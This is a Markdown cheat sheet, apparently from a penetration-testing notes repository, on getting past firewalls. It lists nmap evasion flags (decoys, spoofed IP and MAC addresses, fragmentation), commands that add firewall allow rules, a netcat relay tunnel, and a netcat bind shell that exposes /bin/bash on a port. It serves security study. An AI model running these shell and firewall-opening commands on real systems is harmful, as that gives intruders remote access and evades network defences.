killchain-compendium/reverse_shells/firewalls.md

100 lines
2.1 KiB
Markdown
Raw Normal View History

2021-08-23 01:13:54 +02:00
# Firewall Handling
2022-02-14 23:22:18 +01:00
## Types
* Packet filtering
* Circuit level gateway
* Stateful inspection
* Proxy
* Next generation firewall
* Cloud firewall and FWaaS
## Rules
### Windows
2021-08-23 01:13:54 +02:00
```sh
netsh advfirewall firewall add rule name="muka" dir=in action=allow protocol=tcp localport=57869
```
2022-02-14 23:22:18 +01:00
### CentOS
2021-08-23 01:13:54 +02:00
```sh
firewall-cmd --zone=public --add-port=57869/tcp
```
2022-02-14 23:22:18 +01:00
## Circumvention
* IP/MAC/Port spoofing
* Fragmentation, MTU, data length
* Header modification
### nmap
#### Spoofing
* __Decoy__ `-D` , mixin real IP address with random adresses. Every port will be requested by any of these addresses.
```sh
sudo nmap -Pn -D 192.168.0.23,192.168.0.42,ME -F $TARGET_IP
sudo nmap -Pn -D RND,RND,ME -F $TARGET_IP
```
* __Proxy__
```sh
sudo nmap -Pn -F --proxies $PROXY_IP $TARGET_IP
```
* __Spoofed MAC__
```sh
sudo nmap -Pn -F --spoof-mac $MAC_ADDRESS $TARGET_IP
```
* __Spoofed IP__
```sh
sudo nmap -Pn -F -S $ATTACKER_IP $TARGET_IP
```
* __Port Number__, select a port which is whitelisted. Frequently this is 53,80,44
```sh
sudo nmap -F --source-port 443 $TARGET_IP
```
* __Fragmentation__, eth header + 20 bytes header size + bytes fragments via `-f`, or 16 bytes via `-ff`
```sh
sudo nmap -Pn -F -f $TARGET_IP
```
* __MTU__, works like fragmentation, `-f` == `--mtu 8`
```sh
sudo nmap -Pn -F --mtu 8
```
* __DATA Length__, eth header + IP header + prepend padding segment size to values of bytes
```sh
sudo nmap -Pn -F --data-length 64 $TARGET_IP
```
#### Header Fields
* __TTL__
```sh
sudo nmap -Pn -F --ttl 64 $TARGET_IP
```
* __IP OPTIONS__, `--ip-options` recordsas hex String
* Route, `R`
* Timestamp, `T`
* Route + Timestamp, `U`
* Loose source routing, `L $IP $IP $IP`
* Strict source routing, `S $IP $IP $IP`
* __Checksum__, craft bad checksum via `--badsum` to check errors
```sh
sudo nmap -Pn -F --badsum $TARGET_IP
```
#### After the FW
* __Hopping__, listen via netcat to catch that port
* __Tunneling__, relay open after passsing the firewall to connect to the closed port
```sh
nc -lvnp 443 --sh-exec "nc $TARGET_IP 25"
```
* __Non standard ports__, open bin shell via
```sh
nc -lvnp 8888 -e /bin/bash
```
and connect